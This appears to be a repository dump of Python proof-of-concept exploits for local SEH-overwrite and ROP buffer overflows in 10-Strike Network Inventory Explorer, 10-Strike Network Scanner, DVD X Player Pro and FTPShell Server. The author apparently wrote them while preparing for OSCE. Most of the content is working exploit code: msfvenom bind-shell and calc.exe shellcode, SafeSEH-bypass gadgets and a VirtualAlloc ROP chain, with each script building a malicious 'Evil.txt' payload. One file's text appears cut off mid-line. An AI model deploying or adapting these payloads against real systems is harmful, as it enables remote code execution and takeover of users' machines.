[ { "path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/From Text File/Exploit.py", "content": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------------#\r\n# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #\r\n# Exploit Author : Hashim Jawad - @ihack4falafel #\r\n# Vendor Homepage : https://www.10-strike.com/ #\r\n# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #\r\n# Tested on : Windows 7 Enterprise - SP1 (x86) #\r\n#----------------------------------------------------------------------------------------------------------#\r\n\r\n# Disclosure Timeline:\r\n# ====================\r\n# 06-02-18: Contacted vendor, no response \r\n# 06-03-18: Contacted vendor, no response\r\n# 06-04-18: Contacted vendor, no response\r\n# 06-05-18: Proof of concept exploit published \r\n\r\n'''\r\nSteps to reproduce:\r\n===================\r\n - Under Computers tab click on 'From Text File'\r\n - Open Evil.txt and boom!\r\nNotes:\r\n======\r\n - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]\r\n - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting \r\n the stack by 8 bytes, see buffer for reference.\r\n - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on \r\n your username, the following is the path used while developing the exploit (default on Windows 7): \r\n [C:\\Users\\IEUser\\AppData\\Roaming\\10-strike\\Network Inventory\\cfg\\]\r\n - Pro edition is effected as well. \r\n'''\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d\\x3a\\x5c' -f python -v shellcode\r\n#Payload size: 355 bytes\r\nshellcode = \"\"\r\nshellcode += \"\\xba\\x58\\x39\\xb1\\xae\\xd9\\xcf\\xd9\\x74\\x24\\xf4\\x5f\"\r\nshellcode += \"\\x29\\xc9\\xb1\\x53\\x83\\xef\\xfc\\x31\\x57\\x0e\\x03\\x0f\"\r\nshellcode += \"\\x37\\x53\\x5b\\x53\\xaf\\x11\\xa4\\xab\\x30\\x76\\x2c\\x4e\"\r\nshellcode += \"\\x01\\xb6\\x4a\\x1b\\x32\\x06\\x18\\x49\\xbf\\xed\\x4c\\x79\"\r\nshellcode += \"\\x34\\x83\\x58\\x8e\\xfd\\x2e\\xbf\\xa1\\xfe\\x03\\x83\\xa0\"\r\nshellcode += \"\\x7c\\x5e\\xd0\\x02\\xbc\\x91\\x25\\x43\\xf9\\xcc\\xc4\\x11\"\r\nshellcode += \"\\x52\\x9a\\x7b\\x85\\xd7\\xd6\\x47\\x2e\\xab\\xf7\\xcf\\xd3\"\r\nshellcode += \"\\x7c\\xf9\\xfe\\x42\\xf6\\xa0\\x20\\x65\\xdb\\xd8\\x68\\x7d\"\r\nshellcode += \"\\x38\\xe4\\x23\\xf6\\x8a\\x92\\xb5\\xde\\xc2\\x5b\\x19\\x1f\"\r\nshellcode += \"\\xeb\\xa9\\x63\\x58\\xcc\\x51\\x16\\x90\\x2e\\xef\\x21\\x67\"\r\nshellcode += \"\\x4c\\x2b\\xa7\\x73\\xf6\\xb8\\x1f\\x5f\\x06\\x6c\\xf9\\x14\"\r\nshellcode += \"\\x04\\xd9\\x8d\\x72\\x09\\xdc\\x42\\x09\\x35\\x55\\x65\\xdd\"\r\nshellcode += \"\\xbf\\x2d\\x42\\xf9\\xe4\\xf6\\xeb\\x58\\x41\\x58\\x13\\xba\"\r\nshellcode += \"\\x2a\\x05\\xb1\\xb1\\xc7\\x52\\xc8\\x98\\x8f\\x97\\xe1\\x22\"\r\nshellcode += \"\\x50\\xb0\\x72\\x51\\x62\\x1f\\x29\\xfd\\xce\\xe8\\xf7\\xfa\"\r\nshellcode += \"\\x31\\xc3\\x40\\x94\\xcf\\xec\\xb0\\xbd\\x0b\\xb8\\xe0\\xd5\"\r\nshellcode += \"\\xba\\xc1\\x6a\\x25\\x42\\x14\\x06\\x2d\\xe5\\xc7\\x35\\xd0\"\r\nshellcode += \"\\x55\\xb8\\xf9\\x7a\\x3e\\xd2\\xf5\\xa5\\x5e\\xdd\\xdf\\xce\"\r\nshellcode += \"\\xf7\\x20\\xe0\\xe1\\x5b\\xac\\x06\\x6b\\x74\\xf8\\x91\\x03\"\r\nshellcode += \"\\xb6\\xdf\\x29\\xb4\\xc9\\x35\\x02\\x52\\x81\\x5f\\x95\\x5d\"\r\nshellcode += \"\\x12\\x4a\\xb1\\xc9\\x99\\x99\\x05\\xe8\\x9d\\xb7\\x2d\\x7d\"\r\nshellcode += \"\\x09\\x4d\\xbc\\xcc\\xab\\x52\\x95\\xa6\\x48\\xc0\\x72\\x36\"\r\nshellcode += \"\\x06\\xf9\\x2c\\x61\\x4f\\xcf\\x24\\xe7\\x7d\\x76\\x9f\\x15\"\r\nshellcode += \"\\x7c\\xee\\xd8\\x9d\\x5b\\xd3\\xe7\\x1c\\x29\\x6f\\xcc\\x0e\"\r\nshellcode += \"\\xf7\\x70\\x48\\x7a\\xa7\\x26\\x06\\xd4\\x01\\x91\\xe8\\x8e\"\r\nshellcode += \"\\xdb\\x4e\\xa3\\x46\\x9d\\xbc\\x74\\x10\\xa2\\xe8\\x02\\xfc\"\r\nshellcode += \"\\x13\\x45\\x53\\x03\\x9b\\x01\\x53\\x7c\\xc1\\xb1\\x9c\\x57\"\r\nshellcode += \"\\x41\\xc1\\xd6\\xf5\\xe0\\x4a\\xbf\\x6c\\xb1\\x16\\x40\\x5b\"\r\nshellcode += \"\\xf6\\x2e\\xc3\\x69\\x87\\xd4\\xdb\\x18\\x82\\x91\\x5b\\xf1\"\r\nshellcode += \"\\xfe\\x8a\\x09\\xf5\\xad\\xab\\x1b\"\r\n\r\nbuffer = '\\x41' * 207 # filler to nSEH offset (211-4)\r\nbuffer += '\\x9f\\x4e\\xe9\\x61' # 0x61E94E9F [sqlite3.dll] | jmp esp\r\nbuffer += '\\x90\\x90\\x90\\x90' # nSEH\r\nbuffer += '\\x90\\x90\\x90\\x90' # SEH \r\nbuffer += shellcode # bind shell \r\nbuffer += '\\xcc' * (3000-207-12-len(shellcode)) # junk \r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e" }, { "path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/README.md", "content": "### 10-Strike Network Inventory Explorer 8.54\nStructured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44838/) and [EDB-ID: 44840](https://www.exploit-db.com/exploits/44840/)\n\n

\n \n

\n" }, { "path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/Registration Key/Exploit.py", "content": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------------#\r\n# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #\r\n# Exploit Author : Hashim Jawad - @ihack4falafel #\r\n# Vendor Homepage : https://www.10-strike.com/ #\r\n# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #\r\n# Tested on : Windows 7 Enterprise - SP1 (x86) #\r\n#----------------------------------------------------------------------------------------------------------#\r\n\r\n# Disclosure Timeline:\r\n# ====================\r\n# 06-02-18: Contacted vendor, no response \r\n# 06-03-18: Contacted vendor, no response\r\n# 06-04-18: Contacted vendor, no response\r\n# 06-05-18: Proof of concept exploit published \r\n\r\n'''\r\nSteps to reproduce:\r\n===================\r\n - Under Help, click 'Enter Registration Key'. \r\n - Paste the contents of Evil.txt and click OK.\r\nNotes:\r\n======\r\n - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]\r\n - There is ample space prior to SEH overwrite.\r\n - Pro edition is effected as well.\r\n'''\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -f python -v shellcode\r\n#Payload size: 355 bytes\r\nshellcode = \"\"\r\nshellcode += \"\\xbf\\xad\\xa8\\x1e\\x44\\xdd\\xc0\\xd9\\x74\\x24\\xf4\\x5e\"\r\nshellcode += \"\\x2b\\xc9\\xb1\\x53\\x83\\xc6\\x04\\x31\\x7e\\x0e\\x03\\xd3\"\r\nshellcode += \"\\xa6\\xfc\\xb1\\xd7\\x5f\\x82\\x3a\\x27\\xa0\\xe3\\xb3\\xc2\"\r\nshellcode += \"\\x91\\x23\\xa7\\x87\\x82\\x93\\xa3\\xc5\\x2e\\x5f\\xe1\\xfd\"\r\nshellcode += \"\\xa5\\x2d\\x2e\\xf2\\x0e\\x9b\\x08\\x3d\\x8e\\xb0\\x69\\x5c\"\r\nshellcode += \"\\x0c\\xcb\\xbd\\xbe\\x2d\\x04\\xb0\\xbf\\x6a\\x79\\x39\\xed\"\r\nshellcode += \"\\x23\\xf5\\xec\\x01\\x47\\x43\\x2d\\xaa\\x1b\\x45\\x35\\x4f\"\r\nshellcode += \"\\xeb\\x64\\x14\\xde\\x67\\x3f\\xb6\\xe1\\xa4\\x4b\\xff\\xf9\"\r\nshellcode += \"\\xa9\\x76\\x49\\x72\\x19\\x0c\\x48\\x52\\x53\\xed\\xe7\\x9b\"\r\nshellcode += \"\\x5b\\x1c\\xf9\\xdc\\x5c\\xff\\x8c\\x14\\x9f\\x82\\x96\\xe3\"\r\nshellcode += \"\\xdd\\x58\\x12\\xf7\\x46\\x2a\\x84\\xd3\\x77\\xff\\x53\\x90\"\r\nshellcode += \"\\x74\\xb4\\x10\\xfe\\x98\\x4b\\xf4\\x75\\xa4\\xc0\\xfb\\x59\"\r\nshellcode += \"\\x2c\\x92\\xdf\\x7d\\x74\\x40\\x41\\x24\\xd0\\x27\\x7e\\x36\"\r\nshellcode += \"\\xbb\\x98\\xda\\x3d\\x56\\xcc\\x56\\x1c\\x3f\\x21\\x5b\\x9e\"\r\nshellcode += \"\\xbf\\x2d\\xec\\xed\\x8d\\xf2\\x46\\x79\\xbe\\x7b\\x41\\x7e\"\r\nshellcode += \"\\xc1\\x51\\x35\\x10\\x3c\\x5a\\x46\\x39\\xfb\\x0e\\x16\\x51\"\r\nshellcode += \"\\x2a\\x2f\\xfd\\xa1\\xd3\\xfa\\x68\\xa9\\x72\\x55\\x8f\\x54\"\r\nshellcode += \"\\xc4\\x05\\x0f\\xf6\\xad\\x4f\\x80\\x29\\xcd\\x6f\\x4a\\x42\"\r\nshellcode += \"\\x66\\x92\\x75\\x7d\\x2b\\x1b\\x93\\x17\\xc3\\x4d\\x0b\\x8f\"\r\nshellcode += \"\\x21\\xaa\\x84\\x28\\x59\\x98\\xbc\\xde\\x12\\xca\\x7b\\xe1\"\r\nshellcode += \"\\xa2\\xd8\\x2b\\x75\\x29\\x0f\\xe8\\x64\\x2e\\x1a\\x58\\xf1\"\r\nshellcode += \"\\xb9\\xd0\\x09\\xb0\\x58\\xe4\\x03\\x22\\xf8\\x77\\xc8\\xb2\"\r\nshellcode += \"\\x77\\x64\\x47\\xe5\\xd0\\x5a\\x9e\\x63\\xcd\\xc5\\x08\\x91\"\r\nshellcode += \"\\x0c\\x93\\x73\\x11\\xcb\\x60\\x7d\\x98\\x9e\\xdd\\x59\\x8a\"\r\nshellcode += \"\\x66\\xdd\\xe5\\xfe\\x36\\x88\\xb3\\xa8\\xf0\\x62\\x72\\x02\"\r\nshellcode += \"\\xab\\xd9\\xdc\\xc2\\x2a\\x12\\xdf\\x94\\x32\\x7f\\xa9\\x78\"\r\nshellcode += \"\\x82\\xd6\\xec\\x87\\x2b\\xbf\\xf8\\xf0\\x51\\x5f\\x06\\x2b\"\r\nshellcode += \"\\xd2\\x6f\\x4d\\x71\\x73\\xf8\\x08\\xe0\\xc1\\x65\\xab\\xdf\"\r\nshellcode += \"\\x06\\x90\\x28\\xd5\\xf6\\x67\\x30\\x9c\\xf3\\x2c\\xf6\\x4d\"\r\nshellcode += \"\\x8e\\x3d\\x93\\x71\\x3d\\x3d\\xb6\"\r\n\r\nbuffer = '\\x41' * 4188 # filler to nSEH\r\nbuffer += '\\x75\\x06\\x74\\x06' # nSEH | jump net\r\nbuffer += '\\x7a\\x49\\xe8\\x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]\r\nbuffer += '\\x90' * 8 # nops\r\nbuffer += shellcode # bind shell\r\nbuffer += '\\x41' * (5000-4188-16-len(shellcode)) # junk\r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e" }, { "path": "Local Buffer Overflow/10-StrikeNetworkScannerv3.0/Exploit.py", "content": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------------#\r\n# Exploit Title : 10-Strike Network Scanner v3.0 - Local Buffer Overflow (SEH) #\r\n# Exploit Author : Hashim Jawad - @ihack4falafel #\r\n# Vendor Homepage : https://www.10-strike.com/ #\r\n# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe #\r\n# Tested on : Windows XP Professional - SP3 (x86) #\r\n#----------------------------------------------------------------------------------------------------------#\r\n\r\n# Disclosure Timeline:\r\n# ====================\r\n# 06-02-18: Contacted vendor, no response \r\n# 06-03-18: Contacted vendor, no response\r\n# 06-04-18: Contacted vendor, no response\r\n# 06-05-18: Proof of concept exploit published \r\n\r\n'''\r\nSteps to reproduce:\r\n===================\r\n - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.\r\n - Right-click on newly created host and click 'Trace route...'.\r\n - Repeat the second step and boom.\r\nNotes:\r\n======\r\n - '\\x00' get converted to '\\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.\r\n - All loaded modules are compiled with /SafeSEH.\r\n - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different\r\n offsets and buffer size.\r\n'''\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -v shellcode -f python\r\n#Payload size: 355 bytes\r\nshellcode = \"\"\r\nshellcode += \"\\xb8\\x2b\\x29\\xa7\\x48\\xd9\\xe8\\xd9\\x74\\x24\\xf4\\x5b\"\r\nshellcode += \"\\x29\\xc9\\xb1\\x53\\x31\\x43\\x12\\x03\\x43\\x12\\x83\\xc0\"\r\nshellcode += \"\\xd5\\x45\\xbd\\xea\\xce\\x08\\x3e\\x12\\x0f\\x6d\\xb6\\xf7\"\r\nshellcode += \"\\x3e\\xad\\xac\\x7c\\x10\\x1d\\xa6\\xd0\\x9d\\xd6\\xea\\xc0\"\r\nshellcode += \"\\x16\\x9a\\x22\\xe7\\x9f\\x11\\x15\\xc6\\x20\\x09\\x65\\x49\"\r\nshellcode += \"\\xa3\\x50\\xba\\xa9\\x9a\\x9a\\xcf\\xa8\\xdb\\xc7\\x22\\xf8\"\r\nshellcode += \"\\xb4\\x8c\\x91\\xec\\xb1\\xd9\\x29\\x87\\x8a\\xcc\\x29\\x74\"\r\nshellcode += \"\\x5a\\xee\\x18\\x2b\\xd0\\xa9\\xba\\xca\\x35\\xc2\\xf2\\xd4\"\r\nshellcode += \"\\x5a\\xef\\x4d\\x6f\\xa8\\x9b\\x4f\\xb9\\xe0\\x64\\xe3\\x84\"\r\nshellcode += \"\\xcc\\x96\\xfd\\xc1\\xeb\\x48\\x88\\x3b\\x08\\xf4\\x8b\\xf8\"\r\nshellcode += \"\\x72\\x22\\x19\\x1a\\xd4\\xa1\\xb9\\xc6\\xe4\\x66\\x5f\\x8d\"\r\nshellcode += \"\\xeb\\xc3\\x2b\\xc9\\xef\\xd2\\xf8\\x62\\x0b\\x5e\\xff\\xa4\"\r\nshellcode += \"\\x9d\\x24\\x24\\x60\\xc5\\xff\\x45\\x31\\xa3\\xae\\x7a\\x21\"\r\nshellcode += \"\\x0c\\x0e\\xdf\\x2a\\xa1\\x5b\\x52\\x71\\xae\\xa8\\x5f\\x89\"\r\nshellcode += \"\\x2e\\xa7\\xe8\\xfa\\x1c\\x68\\x43\\x94\\x2c\\xe1\\x4d\\x63\"\r\nshellcode += \"\\x52\\xd8\\x2a\\xfb\\xad\\xe3\\x4a\\xd2\\x69\\xb7\\x1a\\x4c\"\r\nshellcode += \"\\x5b\\xb8\\xf0\\x8c\\x64\\x6d\\x6c\\x84\\xc3\\xde\\x93\\x69\"\r\nshellcode += \"\\xb3\\x8e\\x13\\xc1\\x5c\\xc5\\x9b\\x3e\\x7c\\xe6\\x71\\x57\"\r\nshellcode += \"\\x15\\x1b\\x7a\\x46\\xba\\x92\\x9c\\x02\\x52\\xf3\\x37\\xba\"\r\nshellcode += \"\\x90\\x20\\x80\\x5d\\xea\\x02\\xb8\\xc9\\xa3\\x44\\x7f\\xf6\"\r\nshellcode += \"\\x33\\x43\\xd7\\x60\\xb8\\x80\\xe3\\x91\\xbf\\x8c\\x43\\xc6\"\r\nshellcode += \"\\x28\\x5a\\x02\\xa5\\xc9\\x5b\\x0f\\x5d\\x69\\xc9\\xd4\\x9d\"\r\nshellcode += \"\\xe4\\xf2\\x42\\xca\\xa1\\xc5\\x9a\\x9e\\x5f\\x7f\\x35\\xbc\"\r\nshellcode += \"\\x9d\\x19\\x7e\\x04\\x7a\\xda\\x81\\x85\\x0f\\x66\\xa6\\x95\"\r\nshellcode += \"\\xc9\\x67\\xe2\\xc1\\x85\\x31\\xbc\\xbf\\x63\\xe8\\x0e\\x69\"\r\nshellcode += \"\\x3a\\x47\\xd9\\xfd\\xbb\\xab\\xda\\x7b\\xc4\\xe1\\xac\\x63\"\r\nshellcode += \"\\x75\\x5c\\xe9\\x9c\\xba\\x08\\xfd\\xe5\\xa6\\xa8\\x02\\x3c\"\r\nshellcode += \"\\x63\\xd8\\x48\\x1c\\xc2\\x71\\x15\\xf5\\x56\\x1c\\xa6\\x20\"\r\nshellcode += \"\\x94\\x19\\x25\\xc0\\x65\\xde\\x35\\xa1\\x60\\x9a\\xf1\\x5a\"\r\nshellcode += \"\\x19\\xb3\\x97\\x5c\\x8e\\xb4\\xbd\"\r\n\r\nmagic = '\\xd9\\xee' # fldz\r\nmagic += '\\xd9\\x74\\x24\\xf4' # fnstenv [esp-0xc]\r\nmagic += '\\x59' # pop ecx\r\nmagic += '\\x80\\xc1\\x05' # add cl,0x5\r\nmagic += '\\x80\\xc1\\x05' # add cl,0x5\r\nmagic += '\\x90' # nop\r\nmagic += '\\xfe\\xcd' # dec ch\r\nmagic += '\\xfe\\xcd' # dec ch\r\nmagic += '\\xff\\xe1' # jmp ecx \r\n\r\nbuffer = '\\x90' * 28 # nops\r\nbuffer += shellcode # bind shell\r\nbuffer += '\\xcc' * (516-28-len(shellcode)) # filler to nSEH \r\nbuffer += '\\x75\\x06\\x74\\x06' # nSEH | jump net\r\nbuffer += '\\x18\\x05\\xfc\\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]\r\nbuffer += '\\x90' * 5 # nops \r\nbuffer += magic # jump -512\r\nbuffer += '\\xcc' * (3000-516-4-4-5-len(magic)) # junk\r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e" }, { "path": "Local Buffer Overflow/10-StrikeNetworkScannerv3.0/README.md", "content": "### 10-Strike Network Scanner v3.0\nStructured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44841/)\n\n

\n \n

\n" }, { "path": "Local Buffer Overflow/DVDXPlayerProv5.5/VirtualAlloc()/Exploit.py", "content": "#!/usr/bin/env python\n\nimport struct\nimport time\n\n# bad characters \"\\x00\\x0a\\x0d\\x1a\\x20\"\n\nshellcode = \"\"\nshellcode += \"\\xba\\xad\\xe1\\xd9\\x21\\xda\\xd8\\xd9\\x74\\x24\\xf4\\x5e\\x33\"\nshellcode += \"\\xc9\\xb1\\x31\\x83\\xee\\xfc\\x31\\x56\\x0f\\x03\\x56\\xa2\\x03\"\nshellcode += \"\\x2c\\xdd\\x54\\x41\\xcf\\x1e\\xa4\\x26\\x59\\xfb\\x95\\x66\\x3d\"\nshellcode += \"\\x8f\\x85\\x56\\x35\\xdd\\x29\\x1c\\x1b\\xf6\\xba\\x50\\xb4\\xf9\"\nshellcode += \"\\x0b\\xde\\xe2\\x34\\x8c\\x73\\xd6\\x57\\x0e\\x8e\\x0b\\xb8\\x2f\"\nshellcode += \"\\x41\\x5e\\xb9\\x68\\xbc\\x93\\xeb\\x21\\xca\\x06\\x1c\\x46\\x86\"\nshellcode += \"\\x9a\\x97\\x14\\x06\\x9b\\x44\\xec\\x29\\x8a\\xda\\x67\\x70\\x0c\"\nshellcode += \"\\xdc\\xa4\\x08\\x05\\xc6\\xa9\\x35\\xdf\\x7d\\x19\\xc1\\xde\\x57\"\nshellcode += \"\\x50\\x2a\\x4c\\x96\\x5d\\xd9\\x8c\\xde\\x59\\x02\\xfb\\x16\\x9a\"\nshellcode += \"\\xbf\\xfc\\xec\\xe1\\x1b\\x88\\xf6\\x41\\xef\\x2a\\xd3\\x70\\x3c\"\nshellcode += \"\\xac\\x90\\x7e\\x89\\xba\\xff\\x62\\x0c\\x6e\\x74\\x9e\\x85\\x91\"\nshellcode += \"\\x5b\\x17\\xdd\\xb5\\x7f\\x7c\\x85\\xd4\\x26\\xd8\\x68\\xe8\\x39\"\nshellcode += \"\\x83\\xd5\\x4c\\x31\\x29\\x01\\xfd\\x18\\x27\\xd4\\x73\\x27\\x05\"\nshellcode += \"\\xd6\\x8b\\x28\\x39\\xbf\\xba\\xa3\\xd6\\xb8\\x42\\x66\\x93\\x37\"\nshellcode += \"\\x09\\x2b\\xb5\\xdf\\xd4\\xb9\\x84\\xbd\\xe6\\x17\\xca\\xbb\\x64\"\nshellcode += \"\\x92\\xb2\\x3f\\x74\\xd7\\xb7\\x04\\x32\\x0b\\xc5\\x15\\xd7\\x2b\"\nshellcode += \"\\x7a\\x15\\xf2\\x4f\\x1d\\x85\\x9e\\xa1\\xb8\\x2d\\x04\\xbe\"\n\nbuffer = \"\\x41\" * 260 # eip offset\n\n#----------------------------------------#\n# ROP Chain setup for VirtualAlloc() #\n#----------------------------------------#\n# EAX = NOP (0x90909090) #\n# ECX = flProtect (0x40) #\n# EDX = flAllocationType (0x1000) #\n# EBX = dwSize #\n# ESP = lpAddress (automatic) #\n# EBP = ReturnTo (ptr to jmp esp) # \n# ESI = ptr to VirtualAlloc() #\n# EDI = ROP NOP (RETN) #\n#----------------------------------------#\n \nbuffer += struct.pack('Change pass #\n#----------------------------------------------------------------------------------------------------------#\n\n'''\nNotes:\n=====\n* All loaded modules including base binary are compiled with /SAFESEH\n* Null byte '\\x00' get mangled by the program and end up as space '\\x20' \n'''\n\n#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b \"\\x00\\x0a\\x0d\" -f python -v shellcode\n#Payload size: 447 bytes\nshellcode = \"\"\nshellcode += \"\\x89\\xe0\\xd9\\xed\\xd9\\x70\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\"\nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\"\nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\"\nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\"\nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x79\"\nshellcode += \"\\x6c\\x7a\\x48\\x4c\\x42\\x67\\x70\\x73\\x30\\x57\\x70\\x43\"\nshellcode += \"\\x50\\x4d\\x59\\x4b\\x55\\x36\\x51\\x59\\x50\\x61\\x74\\x4e\"\nshellcode += \"\\x6b\\x56\\x30\\x46\\x50\\x6e\\x6b\\x61\\x42\\x56\\x6c\\x6c\"\nshellcode += \"\\x4b\\x72\\x72\\x32\\x34\\x6e\\x6b\\x61\\x62\\x37\\x58\\x76\"\nshellcode += \"\\x6f\\x38\\x37\\x72\\x6a\\x54\\x66\\x55\\x61\\x4b\\x4f\\x4e\"\nshellcode += \"\\x4c\\x45\\x6c\\x30\\x61\\x71\\x6c\\x35\\x52\\x46\\x4c\\x45\"\nshellcode += \"\\x70\\x6b\\x71\\x58\\x4f\\x44\\x4d\\x77\\x71\\x69\\x57\\x7a\"\nshellcode += \"\\x42\\x6c\\x32\\x63\\x62\\x46\\x37\\x4e\\x6b\\x62\\x72\\x62\"\nshellcode += \"\\x30\\x6e\\x6b\\x53\\x7a\\x47\\x4c\\x4c\\x4b\\x52\\x6c\\x74\"\nshellcode += \"\\x51\\x52\\x58\\x6b\\x53\\x62\\x68\\x77\\x71\\x5a\\x71\\x62\"\nshellcode += \"\\x71\\x4e\\x6b\\x76\\x39\\x57\\x50\\x36\\x61\\x4a\\x73\\x6e\"\nshellcode += \"\\x6b\\x47\\x39\\x56\\x78\\x59\\x73\\x65\\x6a\\x52\\x69\\x6e\"\nshellcode += \"\\x6b\\x57\\x44\\x6c\\x4b\\x67\\x71\\x4e\\x36\\x34\\x71\\x6b\"\nshellcode += \"\\x4f\\x6e\\x4c\\x5a\\x61\\x58\\x4f\\x74\\x4d\\x76\\x61\\x4b\"\nshellcode += \"\\x77\\x70\\x38\\x69\\x70\\x52\\x55\\x38\\x76\\x75\\x53\\x51\"\nshellcode += \"\\x6d\\x59\\x68\\x65\\x6b\\x73\\x4d\\x65\\x74\\x43\\x45\\x78\"\nshellcode += \"\\x64\\x61\\x48\\x6c\\x4b\\x36\\x38\\x67\\x54\\x76\\x61\\x49\"\nshellcode += \"\\x43\\x73\\x56\\x4c\\x4b\\x76\\x6c\\x50\\x4b\\x6e\\x6b\\x31\"\nshellcode += \"\\x48\\x77\\x6c\\x43\\x31\\x79\\x43\\x6e\\x6b\\x43\\x34\\x4c\"\nshellcode += \"\\x4b\\x53\\x31\\x7a\\x70\\x4d\\x59\\x37\\x34\\x66\\x44\\x67\"\nshellcode += \"\\x54\\x33\\x6b\\x53\\x6b\\x50\\x61\\x30\\x59\\x31\\x4a\\x63\"\nshellcode += \"\\x61\\x69\\x6f\\x59\\x70\\x71\\x4f\\x51\\x4f\\x33\\x6a\\x6e\"\nshellcode += \"\\x6b\\x76\\x72\\x6a\\x4b\\x6e\\x6d\\x33\\x6d\\x43\\x5a\\x63\"\nshellcode += \"\\x31\\x6c\\x4d\\x6c\\x45\\x4c\\x72\\x47\\x70\\x45\\x50\\x33\"\nshellcode += \"\\x30\\x56\\x30\\x53\\x58\\x74\\x71\\x4e\\x6b\\x62\\x4f\\x4f\"\nshellcode += \"\\x77\\x59\\x6f\\x6b\\x65\\x6f\\x4b\\x4c\\x30\\x4f\\x45\\x6d\"\nshellcode += \"\\x72\\x43\\x66\\x62\\x48\\x39\\x36\\x6a\\x35\\x6f\\x4d\\x4d\"\nshellcode += \"\\x4d\\x59\\x6f\\x5a\\x75\\x47\\x4c\\x53\\x36\\x63\\x4c\\x55\"\nshellcode += \"\\x5a\\x4f\\x70\\x49\\x6b\\x6d\\x30\\x31\\x65\\x53\\x35\\x6d\"\nshellcode += \"\\x6b\\x62\\x67\\x37\\x63\\x30\\x72\\x62\\x4f\\x32\\x4a\\x55\"\nshellcode += \"\\x50\\x70\\x53\\x79\\x6f\\x6e\\x35\\x31\\x73\\x71\\x71\\x30\"\nshellcode += \"\\x6c\\x71\\x73\\x46\\x4e\\x43\\x55\\x51\\x68\\x35\\x35\\x35\"\nshellcode += \"\\x50\\x41\\x41\"\n\nbuffer = '\\xcc' * 2101 # filler to nSEH offset\nbuffer += '\\xeb\\x06\\x90\\x90' # nSEH | hop over SEH \nbuffer += '\\x18\\x05\\xfc\\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]\nbuffer += '\\x90' * 10 # nops sled\nbuffer += shellcode # calc.exe\nbuffer += '\\xcc' * (5000-2101-4-4-10-len(shellcode))\n\ntry:\n\tf=open(\"Evil.txt\",\"w\")\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\n\tf.write(buffer)\n\tf.close()\n\tprint \"[+] File created!\"\nexcept Exception as e:\n\tprint e\n" }, { "path": "Local Buffer Overflow/FTPShellServerv6.80/README.md", "content": "### FTPShell Server v6.80\nStructured Exception Handler (SEH) overwrite exploit found during my prep to take on OSCE, had to look for an address outside the range of loaded modules (including base image) in order to bypass `safeSEH`. See the link [EDB-ID: 44713](https://www.exploit-db.com/exploits/44713/)\n\n

\n \n

